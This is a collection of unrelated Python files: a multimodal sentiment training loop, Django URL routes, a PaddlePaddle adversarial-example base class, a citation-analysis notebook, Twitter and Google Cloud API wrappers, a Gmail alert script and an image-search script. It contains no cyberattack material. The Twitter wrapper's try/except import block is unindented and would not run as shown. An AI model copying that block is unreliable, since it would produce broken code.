                torch.nn.utils.clip_grad_norm_(ctc_a2l_module.parameters(), hyp_params.clip)
                torch.nn.utils.clip_grad_norm_(ctc_v2l_module.parameters(), hyp_params.clip)
                ctc_a2l_optimizer.step()
                ctc_v2l_optimizer.step()
            torch.nn.utils.clip_grad_norm_(model.parameters(), hyp_params.clip)
            optimizer.step()
            proc_loss += raw_loss.item() * batch_size
            proc_size += batch_size
            epoch_loss += combined_loss.item() * batch_size
            if i_batch % hyp_params.log_interval == 0 and i_batch > 0:
                # Periodic progress log; proc_* track the window since the last log.
                avg_loss = proc_loss / proc_size
                elapsed_time = time.time() - start_time
                print('Epoch {:2d} | Batch {:3d}/{:3d} | Time/Batch(ms) {:5.2f} | Train Loss {:5.4f}'.
                      format(epoch, i_batch, num_batches, elapsed_time * 1000 / hyp_params.log_interval, avg_loss))
                proc_loss, proc_size = 0, 0
                start_time = time.time()
        return epoch_loss / hyp_params.n_train
    def evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=False):
        # Score the model on the valid or test split.
        # Returns (avg_loss, concatenated preds, concatenated truths).
        model.eval()
        loader = test_loader if test else valid_loader
        total_loss = 0.0
        results = []
        truths = []
        with torch.no_grad():
            for i_batch, (batch_X, batch_Y, batch_META) in enumerate(loader):
                sample_ind, text, audio, vision = batch_X
                eval_attr = batch_Y.squeeze(dim=-1) # if num of labels is 1
                if hyp_params.use_cuda:
                    with torch.cuda.device(0):
                        text, audio, vision, eval_attr = text.cuda(), audio.cuda(), vision.cuda(), eval_attr.cuda()
                        if hyp_params.dataset == 'iemocap':
                            eval_attr = eval_attr.long()
                batch_size = text.size(0)
                if (ctc_a2l_module is not None) and (ctc_v2l_module is not None):
                    ctc_a2l_net = nn.DataParallel(ctc_a2l_module) if batch_size > 10 else ctc_a2l_module
                    ctc_v2l_net = nn.DataParallel(ctc_v2l_module) if batch_size > 10 else ctc_v2l_module
                    audio, _ = ctc_a2l_net(audio) # audio aligned to text
                    vision, _ = ctc_v2l_net(vision) # vision aligned to text
                net = nn.DataParallel(model) if batch_size > 10 else model
                preds, _ = net(text, audio, vision)
                if hyp_params.dataset == 'iemocap':
                    preds = preds.view(-1, 2)
                    eval_attr = eval_attr.view(-1)
                total_loss += criterion(preds, eval_attr).item() * batch_size
                # Collect the results into dictionary
                results.append(preds)
                truths.append(eval_attr)
        avg_loss = total_loss / (hyp_params.n_test if test else hyp_params.n_valid)
        results = torch.cat(results)
        truths = torch.cat(truths)
        return avg_loss, results, truths
    best_valid = 1e8
    for epoch in range(1, hyp_params.num_epochs+1):
        start = time.time()
        train(model, optimizer, criterion, ctc_a2l_module, ctc_v2l_module, ctc_a2l_optimizer, ctc_v2l_optimizer, ctc_criterion)
        val_loss, _, _ = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=False)
        test_loss, _, _ = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=True)
        end = time.time()
        duration = end-start
        scheduler.step(val_loss)    # Decay learning rate by validation loss
        print("-"*50)
        print('Epoch {:2d} | Time {:5.4f} sec | Valid Loss {:5.4f} | Test Loss {:5.4f}'.format(epoch, duration, val_loss, test_loss))
        print("-"*50)
        if val_loss < best_valid:
            # Checkpoint on every validation improvement.
            print(f"Saved model at pre_trained_models/{hyp_params.name}.pt!")
            save_model(hyp_params, model, name=hyp_params.name)
            best_valid = val_loss
    # Reload the best checkpoint and report the final dataset-specific metrics.
    model = load_model(hyp_params, name=hyp_params.name)
    _, results, truths = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=True)
    if hyp_params.dataset == "mosei_senti":
        eval_mosei_senti(results, truths, True)
    elif hyp_params.dataset == 'mosi':
        eval_mosi(results, truths, True)
    elif hyp_params.dataset == 'iemocap':
        eval_iemocap(results, truths)
    sys.stdout.flush()
    input('[Press Any Key to start another run]')
|
from django.conf.urls import *
from django.contrib.auth.decorators import permission_required
import signbank.video.views
# URL routes for the video app. `url` comes from the star import above
# (django.conf.urls); `permission_required` gates still-image creation on the
# 'dictionary.change_gloss' permission.
# NOTE(review): `django.conf.urls.url` is deprecated/removed in recent Django —
# confirm the project's pinned Django version still provides it.
urlpatterns = [
    url(r'^video/(?P<videoid>\d+)$', signbank.video.views.video),
    url(r'^upload/', signbank.video.views.addvideo),
    url(r'^delete/(?P<videoid>\d+)$', signbank.video.views.deletevideo),
    url(r'^create_still_images/', permission_required('dictionary.change_gloss')(signbank.video.views.create_still_images))
]
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The base model of the model.
"""
# TODO: support batch input.
import logging
from abc import ABCMeta
from abc import abstractmethod
import paddle
class Attack(object):
    """
    Abstract base class for adversarial attacks. An `Attack` searches for an
    adversarial example (AE) for a given model. Subclasses must implement the
    _apply(self, adversary, **kwargs) method.
    Args:
        model(Model): an instance of a models.base.Model.
        norm(str): 'Linf' or 'L2', the norm of the threat model.
        epsilon_ball(float): the bound on the norm of the AE.
        epsilon_stepsize(float): the per-step perturbation size.
    """
    # NOTE(review): __metaclass__ is a Python-2 mechanism and has no effect on
    # Python 3, so abstractness is not actually enforced at instantiation here.
    __metaclass__ = ABCMeta
    def __init__(self, model, norm='Linf', epsilon_ball=8/255, epsilon_stepsize=2/255):
        # Typical L2 settings: norm='L2', epsilon_ball=128/255, epsilon_stepsize=15/255
        self.model = model
        self._device = paddle.get_device()
        assert norm in ('Linf', 'L2')
        self.norm = norm
        self.epsilon_ball = epsilon_ball  # bound on the perturbation norm
        self.epsilon_stepsize = epsilon_stepsize  # step size per attack iteration
        # Normalizer built from the victim model's own preprocessing constants.
        self.normalize = paddle.vision.transforms.Normalize(mean=self.model.normalization_mean,
                                                            std=self.model.normalization_std)
    def __call__(self, adversary, **kwargs):
        """
        Generate the adversarial sample.
        Args:
            adversary(object): The adversary object.
            **kwargs: Other named arguments.
        Returns:
            The adversary object returned by the subclass's _apply.
        """
        # make sure data in adversary is compatible with self.model
        adversary.routine_check(self.model)
        adversary.generate_denormalized_original(self.model.input_channel_axis,
                                                 self.model.normalization_mean,
                                                 self.model.normalization_std)
        # _apply generate denormalized AE to perturb adversarial in pre-normalized domain
        adversary = self._apply(adversary, **kwargs)
        return adversary
    def input_preprocess(self, img):
        """
        Normalize img and add batchsize dimension safely.
        Args:
            img: paddle.tensor. initial input before normalization.
        Returns:
            unaked_img_normalized: paddle.tensor. normalized img that covered with batchsize dimension.
        """
        assert isinstance(img, paddle.Tensor)
        img_normalized = self.normalize(img)
        # Only unsqueeze when the tensor does not already carry a batch dimension.
        if len(self.model.input_shape) < img_normalized.ndim:
            unaked_img_normalized = img_normalized
        else:
            unaked_img_normalized = paddle.unsqueeze(img_normalized, axis=0)
        return unaked_img_normalized
    def safe_delete_batchsize_dimension(self, img):
        """
        Compare dimension setting in model, delete batchsize,
        dimension (axis=0) if there's dimension redundancy.
        Args:
            img: paddle.tensor
        Returns:
            naked_img: paddle.tensor. img that deleted redundant batchsize dimension.
        """
        assert isinstance(img, paddle.Tensor)
        if len(self.model.input_shape) < img.ndim:
            naked_img = paddle.squeeze(img, axis=0)
        else:
            naked_img = img
        return naked_img
    @abstractmethod
    def _apply(self, adversary, **kwargs):
        """
        Search an adversarial example.
        Args:
            adversary(object): The adversary object.
            **kwargs: Other named arguments.
        Returns:
            The adversary object (with the search result attached by the subclass).
        """
        raise NotImplementedError
|
#!/usr/bin/env python
# coding: utf-8
# # This will create plots for institutions of universities in THE WUR univs only and for the period of 2007-2017. The input dataset contains info of THE WUR univs only but for any period of time.
# #### The unpaywall dump used was from (April or June) 2018; hence analysis until 2017 only is going to be included.
# ## Question : What is the distribution of incoming citation counts for OA and non-OA papers published by THE WUR univ within each country?
# In[1]:
# standard path wrangling to be able to import project config and sources
import os
import sys
from os.path import join
root = os.path.dirname(os.getcwd())
sys.path.append(root)
print('Project root: {}'.format(root))
# In[2]:
sys.path.append(join(root,"spark/shared/"))
from MAG_utils import *
# In[ ]:
# In[3]:
# Built-in
import json
# Installed
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib import rc,rcParams
from matplotlib.patches import Rectangle
import unicodedata
import re
from statistics import mean
# In[4]:
cfg = None
# Project-wide configuration (includes the THE WUR institution lists per country).
with open(join(root,"spark/config.json")) as fp:
    cfg = json.load(fp)
# In[5]:
# cfg
# In[6]:
# Display names for plot labels, keyed by the dataset's country slug.
cnames_for_plot = {
    "austria" : "Austria",
    "brazil" : "Brazil",
    "germany" : "Germany",
    "india" : "India",
    "portugal" : "Portugal",
    "russia" : "Russia",
    "uk" : "UK",
    "usa" : "USA"
}
# In[7]:
output_dir = join(root,"documents/analysis/dataset_selection_question5")
# In[ ]:
# Create a new directory to save results. exist_ok=True so re-running the
# notebook does not crash with FileExistsError (the original os.makedirs
# raised when the directory already existed).
os.makedirs(output_dir, exist_ok=True)
# In[8]:
# Analysis window: the unpaywall dump only supports analysis up to 2017.
study_years = [2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017]
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# # Extraction of Citation Counts of OA and unknown papers for each university
# In[9]:
def get_univ_papers_citation_counts(country_papers_OA_df, univs_name):
    '''
    Get the plot of count of citations for both OA and non-OA papers for each university in the input country

    Returns:
        (univs_info, univs_not_found, univs_found) where univs_info maps each
        matched THE university name to its summed OA / unknown citation counts,
        and the two lists record which THE names could / could not be matched
        against the MAG-derived dataframe.
    '''
    univs_info = {}
    univs_not_found = []
    univs_found = []
    for org_univ_name in set(univs_name): # remove duplicate univ names in the THE list, if any
        # print(org_univ_name)
        THE_univ_name_normalised = mag_normalisation_institution_names(org_univ_name)
        '''
        The dataframe that will be selected for the current univ is either :
        1. When the MAG normalizedname column matches to THE_univ_name_normalised
        or
        2. When the MAG normalised(wikiname) matches to THE_univ_name_normalised -- this matches English names (in MAG wiki links as well as THE) of non English name (in MAG normalisedname or displayname) universities.
        '''
        univ_papers_df_set1 = country_papers_OA_df[country_papers_OA_df['normalizedname']==THE_univ_name_normalised]
        univ_papers_df_set2 = country_papers_OA_df[country_papers_OA_df['normalizedwikiname']==THE_univ_name_normalised]
        # The records in two sets can be exactly the same
        # Concat and remove exact duplicates -- https://stackoverflow.com/a/21317570/530399
        univ_papers_df = pd.concat([univ_papers_df_set1, univ_papers_df_set2]).drop_duplicates().reset_index(drop=True)
        # Put additional criteria that these papers are from 2007 till 2017
        univ_papers_df = univ_papers_df[univ_papers_df['year'].isin(study_years)]
        # Same paper will have multiple entries if there are multiple authors for that paper from same university.
        # This is not necessary because the input dataset was already prepared to exclude such duplicates.
        # univ_papers_df = univ_papers_df.drop_duplicates(subset="paperid")
        count_total_univ_papers = len(univ_papers_df)
        # For those I couldn't match/find their name, it is not fair to say that their OA count is 0. Should be excluded from the graph.
        if count_total_univ_papers==0:
            univs_not_found.append(org_univ_name+" @ "+THE_univ_name_normalised)
        else:
            univs_found.append(org_univ_name)
            univs_info[org_univ_name] = {}
            OA_univ_papers_df = univ_papers_df[univ_papers_df['is_OA']=="true"] # stored as a string in csv
            unknown_univ_papers_df = univ_papers_df[univ_papers_df['is_OA']!="true"] # stored as a string in csv
            # Get the total count of citations for OA and unknown papers -- int casting needed to convert numpy int (json-incompatible) to python int
            univs_info[org_univ_name]["citationcount_OA_papers"] = int(OA_univ_papers_df['citationcount'].sum())
            univs_info[org_univ_name]["citationcount_unknown_papers"] = int(unknown_univ_papers_df['citationcount'].sum())
    return univs_info, univs_not_found, univs_found
# In[10]:
# Aggregate citation counts per country, and record which THE university
# names could (not) be matched in the MAG-derived per-country CSVs.
all_countries_all_univs_OA_info = {}
all_countries_univs_found_not_found = {}
for country_name,univs_name in cfg['data']['all_THE_WUR_institutions_by_country'].items():
    print("\nProcesing for dataset of univs in "+country_name+"\n")
    all_countries_univs_found_not_found[country_name] = {}
    # CSV has repeated header from multiple partitions of the merge on pyspark csv output. Hence need to treat as string.
    country_papers_OA_df = pd.read_csv(join(root,"data/processed/cc_oa_"+country_name+"_papers.csv"), header=0, sep=",", dtype={'is_OA': object, "url_lists_as_string": object, "year": object, "wikipage": object, "normalizedwikiname": object, "citationcount": object}) # object means string
    # Then eliminate problematic lines
    # temp fix until spark csv merge header issue is resolved -- the header line is present in each re-partition's output csv
    country_papers_OA_df.drop(country_papers_OA_df[country_papers_OA_df.paperid == "paperid"].index, inplace=True)
    # Then reset dtypes as needed.
    country_papers_OA_df = country_papers_OA_df.astype({'year':int}) # todo : for other types too including is_OA and update the check method to boolean type
    country_papers_OA_df = country_papers_OA_df.astype({'citationcount':int})
    univs_info, univs_not_found, univs_found = get_univ_papers_citation_counts(country_papers_OA_df, univs_name)
    all_countries_all_univs_OA_info[country_name] = univs_info
    # Bookkeeping: matched / unmatched universities, absolute and in percent.
    count_total_univs = len(univs_not_found) + len(univs_found)
    not_found_details = {}
    not_found_details['univ_names'] = univs_not_found
    not_found_details['count_univs'] = len(univs_not_found)
    not_found_details['percent_univs'] = (len(univs_not_found)*100.00)/count_total_univs
    found_details = {}
    found_details['univ_names'] = univs_found
    found_details['count_univs'] = len(univs_found)
    found_details['percent_univs'] = (len(univs_found)*100.00)/count_total_univs
    all_details = {}
    all_details['count_univs'] = count_total_univs
    all_countries_univs_found_not_found[country_name]['not_found'] = not_found_details
    all_countries_univs_found_not_found[country_name]['found'] = found_details
    all_countries_univs_found_not_found[country_name]['all'] = all_details
    print("Computed citation counts for all univs in "+country_name+"\n")
# In[11]:
# Write text files with the infos (JSON-formatted, human readable)
with open(join(output_dir,'all_countries_univs_found_not_found.txt'), 'w') as file:
    file.write(json.dumps(all_countries_univs_found_not_found, sort_keys=True, indent=4, ensure_ascii=False))
with open(join(output_dir,'all_countries_all_univs_cc_info.txt'), 'w') as file:
    file.write(json.dumps(all_countries_all_univs_OA_info, sort_keys=True, indent=4, ensure_ascii=False))
# In[ ]:
# # Load data from previously saved files
# In[12]:
with open(join(output_dir,'all_countries_all_univs_cc_info.txt')) as file:
    all_countries_all_univs_OA_info = json.load(file)
# all_countries_all_univs_OA_info
# # Create bar plot for each of the countries
# In[13]:
def label_bar_with_value(ax, rects, value_labels):
    """
    Write the matching label from value_labels just above each bar's top edge.
    """
    for idx, rect in enumerate(rects):
        ax.text(rect.get_x() + rect.get_width()/2., 1.05*rect.get_height(),
                '%s' % value_labels[idx],
                ha='center', va='bottom')
def create_citation_count_distribution_bar_chart(univs_details, save_fname, x_label, save_file=True):
    """Grouped bar chart: OA vs unknown citation counts per university.

    Universities are sorted by their OA citation share; each OA bar is
    annotated with that share in percent. Returns the matplotlib figure,
    and also saves it to <save_fname>.png/.pdf when save_file is True.
    """
    # https://chrisalbon.com/python/data_visualization/matplotlib_grouped_bar_plot/
    # https://stackoverflow.com/a/42498711/530399
    univs_name = [x for x in univs_details.keys()]
    univs_data = univs_details.values()
    univs_oa_citation_counts = [x['citationcount_OA_papers'] for x in univs_data]
    univs_unknown_citation_counts = [x['citationcount_unknown_papers'] for x in univs_data]
    raw_data = {'univs_name': univs_name,
                'univs_oa_citation_counts': univs_oa_citation_counts,
                'univs_unknown_citation_counts': univs_unknown_citation_counts
                }
    df = pd.DataFrame(raw_data, columns = ['univs_name', 'univs_oa_citation_counts', 'univs_unknown_citation_counts'])
    # Compute proportion of univs_oa_citation_counts
    df['proportion_univs_oa_citation_counts'] = (df['univs_oa_citation_counts'] / (df['univs_oa_citation_counts'] + df['univs_unknown_citation_counts'])) *100
    # sort the df based on proportion of univs_oa_citation_counts
    df = df.sort_values('proportion_univs_oa_citation_counts', ascending=False)[['univs_name', 'univs_oa_citation_counts','univs_unknown_citation_counts', 'proportion_univs_oa_citation_counts']]
    # Setting the positions and width for the bars
    pos = list(range(len(df['univs_name'])))
    width = 0.25
    # Plotting the bars
    fig, ax = plt.subplots(figsize=(25,10))
    # Create a bar with oa_citation_count data,
    # in position pos,
    oa_citation_count_bars = ax.bar(pos,
            #using df['univs_oa_citation_counts'] data,
            df['univs_oa_citation_counts'],
            # of width
            width,
            # with alpha 0.5
            alpha=0.5,
            # with color
            color='green',
            )
    # Set heights based on the percentages
    oa_citation_counts_proportion_value_labels = [str(int(x))+"%" for x in df['proportion_univs_oa_citation_counts'].values.tolist()]
    # Create a bar with unknown_citation_count data,
    # in position pos + some width buffer,
    plt.bar([p + width for p in pos],
            #using df['univs_unknown_citation_counts'] data,
            df['univs_unknown_citation_counts'],
            # of width
            width,
            # with alpha 0.5
            alpha=0.5,
            # with color
            color='red',
            )
    # Set the y axis label
    ax.set_ylabel('Incoming Citation Counts')
    # Set the x axis label
    ax.set_xlabel(x_label)
    # Set the position of the x ticks
    ax.set_xticks([p + 0.5 * width for p in pos])
    # Set the labels for the x ticks
    ax.set_xticklabels(df['univs_name'], rotation='vertical')
    # Setting the x-axis and y-axis limits
    plt.xlim(min(pos)-width, max(pos)+width*4)
    plt.ylim([0, max(df['univs_oa_citation_counts'] + df['univs_unknown_citation_counts'])] )
    # Adding the legend and showing the plot
    plt.legend(['OA papers Citation Counts', 'Unknown papers Citation Counts'], loc='upper left')
    plt.grid()
    # Annotate the OA bars with the OA share percentages computed above.
    label_bar_with_value(ax, oa_citation_count_bars, oa_citation_counts_proportion_value_labels)
    if save_file:
        plt.savefig(save_fname+".png", bbox_inches='tight', dpi=300)
        plt.savefig(save_fname+".pdf", bbox_inches='tight', dpi=900)
        plt.close()
    return fig
# In[14]:
# Dead manual-test snippet deliberately kept as a string literal (single
# country, no file output); not executed.
'''country_name = 'usa'
univs_details = all_countries_all_univs_OA_info[country_name]
create_citation_count_distribution_bar_chart(univs_details, save_fname = join(output_dir,country_name+"_"+'citationscount_distribution'), x_label = ("Universities in "+country_name), save_file=False)'''
# In[15]:
# Render and save one chart per country.
for country_name, univs_details in all_countries_all_univs_OA_info.items():
    create_citation_count_distribution_bar_chart(univs_details, save_fname = join(output_dir,country_name+"_"+'citationscount_distribution'), x_label = ("Universities in "+cnames_for_plot[country_name]), save_file=True)
# In[ ]:
# In[16]:
print("\n\n\nCompleted!!!")
# In[ ]:
|
def DataFrameRelatorio(listaUsuarios, listaMegaBytes, listaMegaBytesPorcentagem):
    '''Build the report table (DataFrame) from the three parallel lists.'''
    # Column name -> column data; the dict order defines the column order.
    colunas = {
        "Usuário": listaUsuarios,
        "Espaço Utilizado": listaMegaBytes,
        "% de Uso": listaMegaBytesPorcentagem,
    }
    return pd.DataFrame(colunas)
|
def reverse(k):
    """Return the characters of k concatenated in reverse order.

    Works for a string (returns the reversed string) and, like the original
    loop, for any iterable of strings (their concatenation, reversed).
    """
    # The original prepended one character at a time into an accumulator named
    # `str` — shadowing the builtin and doing O(n^2) string copies.
    return "".join(reversed(list(k)))
# Simple CLI demo: read a word, print it as entered and reversed.
# ("awal" / "dibalik" are Indonesian for "initial" / "reversed" — note only,
# the printed strings are left untouched.)
k = input('word:')
print ("awal : ",end="")
print (k)
print ("dibalik : ",end="")
print (reverse(k))
|
import os
from .gcloud import GoogleCloud
class GoogleCloudRepository:
    """Repository wrapper around GoogleCloud secret access for the fitbit domain."""
    def __init__(self, gc: GoogleCloud) -> None:
        self.gc = gc
    def get_firebase_credential(self):
        """Return the first secret labelled as the firebase credentials config."""
        credentials = self.gc.get_secrets(filter="labels.domain:fitbit AND labels.type:firebase-config AND labels.id:credentials")
        return credentials[0]
    def get_realtime_db_url(self):
        """Return the first secret labelled as the firebase realtime-db URL."""
        credentials = self.gc.get_secrets(filter="labels.domain:fitbit AND labels.type:firebase-config AND labels.id:db-url")
        return credentials[0]
    def get_users_secrets(self):
        """Return all secrets (no label filter)."""
        return self.gc.get_secrets()
    def add_secret_version(self, secret_id, payload):
        """Merge `payload` into the current value of `secret_id` and store the result as a new version."""
        old_payload = self.gc.get_secret(secret_id)
        # Copy before merging so the object returned by get_secret is not mutated
        # in place (the original aliased it and updated the shared object).
        new_payload = dict(old_payload)
        new_payload.update(payload)
        # NOTE(review): secret_id is not forwarded here; if GoogleCloud.add_secret_version
        # needs a target secret id, this writes to the wrong/default secret — confirm.
        self.gc.add_secret_version(new_payload)
import abc
class Command(abc.ABC):
    """Abstract base for CLI commands; concrete subclasses register themselves by name."""
    # Sentinel name marking an abstract/base command that must not be instantiated.
    name = 'base'
    @abc.abstractmethod
    def configure(self, parser):
        """Configures the argument parser for the command."""
        pass
    @abc.abstractmethod
    def run(self, args):
        """Runs the command."""
        pass
    @classmethod
    def available_commands(cls):
        """Returns dict mapping command name to a fresh instance, skipping bases."""
        commands = {}
        for command_cls in cls._get_subclasses():
            if command_cls.name != 'base':
                commands[command_cls.name] = command_cls()
        return commands
    @classmethod
    def _get_subclasses(cls):
        # Depth-first walk: each child's own subtree is yielded before the child.
        for child in cls.__subclasses__():
            yield from child._get_subclasses()
            yield child
|
import time
import traceback
# .TwitterAPI is a local copy used for development purposes. If not present, import from the installed module (prod)
try:
from .TwitterAPI import TwitterAPI
except ImportError:
from TwitterAPI import TwitterAPI
def auto_retry(request):
    """Decorator: run `request` up to 3 times, sleeping 60s between attempts.

    The traceback of each failed attempt is printed; after the third failure
    a generic Exception is raised. The original also slept 60s *after* the
    final failure, delaying the raise for no benefit — that sleep is skipped.
    """
    def aux(*args, **kwargs):
        retries = 3
        while retries > 0:
            try:
                return request(*args, **kwargs)
            except Exception:
                traceback.print_exc()
                retries = retries - 1
                # Only pause when another attempt will actually follow.
                if retries > 0:
                    time.sleep(60)
        raise Exception("Request failed after 3 retries")
    return aux
class MyTwitterAPI:
    """Wrapper holding both a Twitter API v1.1 and a v2 client.

    Transient failures are retried via the auto_retry decorator, and several
    methods sleep after a request to stay within rate limits.
    """
    def __init__(self, api_key, api_key_secret, access_token, access_token_secret):
        # v1.1 client: used by me() and get_retweeters().
        self.api1 = TwitterAPI(
            api_key,
            api_key_secret,
            access_token,
            access_token_secret,
            api_version="1.1",
            auth_type="oAuth1",
        )
        # v2 client: used for followers, tweets and likes lookups.
        self.api2 = TwitterAPI(
            api_key,
            api_key_secret,
            access_token,
            access_token_secret,
            api_version="2",
            auth_type="oAuth1",
        )
    def me(self):
        """Return the authenticated user's profile; raise ValueError if credentials fail."""
        req = self.api1.request(
            "account/verify_credentials",
            params={
                "include_entities": False,
                "skip_status": True,
                "include_email": False,
            },
        )
        if req.status_code != 200:
            raise ValueError("Twitter credentials not valid. Unable to verify user")
        return req.response.json()
    def get_followers(self, user_id, page_size=100):
        """Use v2 endpoint to get the followers of this account. Followers are paginated by the max amount which is 1000
        See:
        https://developer.twitter.com/en/docs/twitter-api/users/follows/quick-start
        """
        @auto_retry
        def request_followers(next_token=None):
            # One page of followers; next_token continues a previous page.
            req = self.api2.request(
                f"users/:{user_id}/followers",
                params={"max_results": page_size, "pagination_token": next_token},
            )
            if req.status_code != 200:
                raise ValueError("Error while fetching followers: ", req.text)
            response = req.response.json()
            return response.get("data", []), response.get("meta", dict())
        # Start returning followers
        followers, meta = request_followers()
        while followers:
            for item in followers:
                yield item
            # Request more followers
            next_token = meta.get("next_token")
            if next_token:
                followers, meta = request_followers(next_token)
            else:
                followers = []
    @auto_retry
    def get_tweets(self, tweets_ids):
        """
        Only 100 tweet_ids can be queried at a time
        See:
        https://developer.twitter.com/en/docs/twitter-api/tweets/lookup/api-reference/get-tweets
        """
        # Get this list of tweets
        params = {
            "ids": ",".join([str(t) for t in tweets_ids]),
            "tweet.fields": "created_at,referenced_tweets",
            "expansions": "author_id,referenced_tweets.id,referenced_tweets.id.author_id",
        }
        req = self.api2.request(f"tweets", params=params)
        if req.status_code != 200:
            raise ValueError(f"Error while fetching tweets {tweets_ids}: ", req.text)
        res = req.response.json()
        # This request can only be done every 1 second
        time.sleep(2)
        return res.get("data", [])
    def get_user_tweets(self, user_id, start_time=None, end_time=None, page_size=100):
        """Yield the user's tweets (v2), following pagination page by page."""
        @auto_retry
        def request_tweets(next_token=None):
            # Builds params for this request
            params = {
                "max_results": page_size,
                "pagination_token": next_token,
                "tweet.fields": "author_id,in_reply_to_user_id,created_at,public_metrics",
                "start_time": start_time,
                "end_time": end_time,
            }
            # Perform request
            req = self.api2.request(
                f"users/:{user_id}/tweets",
                params=params,
            )
            if req.status_code != 200:
                raise ValueError("Error while fetching tweets: ", req.text)
            response = req.response.json()
            # This request can be performed every second
            time.sleep(1)
            return response.get("data", []), response.get("meta", dict())
        # Start returning tweets
        tweets, meta = request_tweets()
        while tweets:
            for item in tweets:
                yield item
            # Request more tweets
            next_token = meta.get("next_token")
            if next_token:
                tweets, meta = request_tweets(next_token)
            else:
                tweets = []
    @auto_retry
    def get_tweet_favs(self, tweet_id):
        """Return the ids of users who liked tweet_id."""
        # Get the list of users who liked this tweet.
        req = self.api2.request(f"tweets/:{tweet_id}/liking_users")
        if req.status_code != 200:
            raise ValueError("Error while fetching favs: ", req.text)
        res = req.response.json()
        # This request can only be done every 15 seconds
        time.sleep(15)
        return [user["id"] for user in res.get("data", [])]
    @auto_retry
    def get_retweeters(self, tweet_id):
        """Return up to 100 retweeter ids for tweet_id (v1.1 endpoint)."""
        # Get the list of everyone who has retweeted this tweet
        # This request has no rate limit
        req = self.api1.request(
            f"statuses/retweeters/ids",
            params={"id": tweet_id, "count": 100, "stringify_ids": True},
        )
        if req.status_code != 200:
            raise ValueError("Error while fetching RTs: ", req.text)
        res = req.response.json()
        return res.get("ids", [])
import smtplib
import json
from email.message import EmailMessage
import winsound
# Load gmail credentials and the subscriber list from the local config file
# (path is relative to the process working directory).
with open('./quant/config.json') as json_file:
    data = json.load(json_file)
GMAIL_USER = data['gmail']['user']
GMAIL_PASSWORD = data['gmail']['password']
SUBSCRIBERS = data['subscribers']
def notification(source, ticker, interval, timeframe, url):
    """Beep and e-mail all subscribers that ``source`` fired on ``ticker``.

    Parameters:
        source: name of the signal/indicator that triggered.
        ticker: instrument symbol.
        interval: numeric timeframe size (e.g. 15).
        timeframe: enum-like object whose ``.name`` is the unit label.
        url: chart link appended to the message body.
    """
    print("not start")
    winsound.Beep(700, 1000)  # audible alert (Windows-only module)
    msg = EmailMessage()
    msg['From'] = GMAIL_USER
    msg['To'] = SUBSCRIBERS
    msg['Subject'] = f'{source} {ticker}'
    msg.set_content("\n" + source + " has been detected on " + ticker + " on timeframe : " + str(interval) + \
                    timeframe.name + "\n" + url)
    try:
        # Context manager guarantees the connection is closed/quit even when
        # login or send fails (the original leaked the socket on error).
        with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
            server.ehlo()
            server.login(GMAIL_USER, GMAIL_PASSWORD)
            server.send_message(msg)
        print('Email sent!')
    except Exception as e:
        print(e)
        print('Something went wrong...')
|
'''
the primary output of the project
this script performs the actual image search
'''
from shared.configurationParser import retrieveConfiguration as rCon
from shared.histogramFeatureMethods import singleImageHisto
from shared.convnetFeatureMethods import singleImageConv
from shared.localBinaryPatternsMethods import singleImageLBP
from shared.similarityMethods import getMostLeastSimilar
from shared.utilities import loadLabelled, loadObj
import matplotlib.pyplot as plt
# Select the query image from the "play" set by its configured index.
playIndex = rCon('PLAY_IMAGE_INDEX')
playImages, playLabels = loadLabelled(rCon('DATA_NAME_PLAY'))
selectedImage = playImages[playIndex]
selectedImageClass = playLabels[playIndex]
# Pick the configured feature extractor and load the matching pre-computed
# database features for the training set.
method = rCon('SEARCHER_METHOD')
if method == 'HISTOGRAM':
    dbFeatures, dbLabels = loadLabelled(rCon('HISTOGRAM_FEATURE_PATH_TRAINING'))
    features = singleImageHisto(selectedImage, bucket_resolution=rCon('HISTOGRAM_BUCKET_RESOLUTION'))
elif method == 'CNN':
    dbFeatures, dbLabels = loadLabelled(rCon('CONVNET_FEATURE_PATH_TRAINING'))
    model = loadObj(rCon('CONVNET_MODEL_PATH'))
    features = singleImageConv(selectedImage, model=model)
elif method == 'LBP':
    dbFeatures, dbLabels = loadLabelled(rCon('LBP_FEATURE_PATH_TRAINING'))
    features = singleImageLBP(selectedImage)
else:
    # Original raised a bare TypeError(); include the offending value so a
    # misconfigured SEARCHER_METHOD is diagnosable from the traceback.
    raise TypeError(f"Unsupported SEARCHER_METHOD: {method!r}")
# Rank the database against the query, then show the query image first.
msIdx, lsIdx, _, _ = getMostLeastSimilar(dbFeatures, features, qty_most=4, qty_least=4)
dbImages, _ = loadLabelled(rCon('DATA_NAME_TRAINING'))
plt.imshow(selectedImage)
plt.show()
# Display the four most similar, then the four least similar images.
mostSimilarImages = dbImages[msIdx].tolist()
for image in mostSimilarImages:
    plt.imshow(image)
    plt.show()
leastSimilarImages = dbImages[lsIdx].tolist()
print(lsIdx)
for image in leastSimilarImages:
    plt.imshow(image)
    plt.show()
import torch as tc
class LinearActionValueHead(tc.nn.Module):
    """Action-value (Q) head: a single affine map from features to one
    Q-value per action."""

    def __init__(self, num_features, num_actions):
        super().__init__()
        self._num_features = num_features
        self._num_actions = num_actions
        # Attribute name kept as `_linear` so state_dict keys are unchanged.
        self._linear = tc.nn.Linear(
            in_features=num_features, out_features=num_actions, bias=True)

    @property
    def num_actions(self):
        """Number of discrete actions (size of the output dimension)."""
        return self._num_actions

    def forward(self, x):
        """Map features [..., num_features] to Q-values [..., num_actions]."""
        return self._linear(x)
class DuelingActionValueHead(tc.nn.Module):
    """Dueling Q head: Q(s, a) = V(s) + A(s, a), with the advantage
    mean-centered over actions for identifiability."""

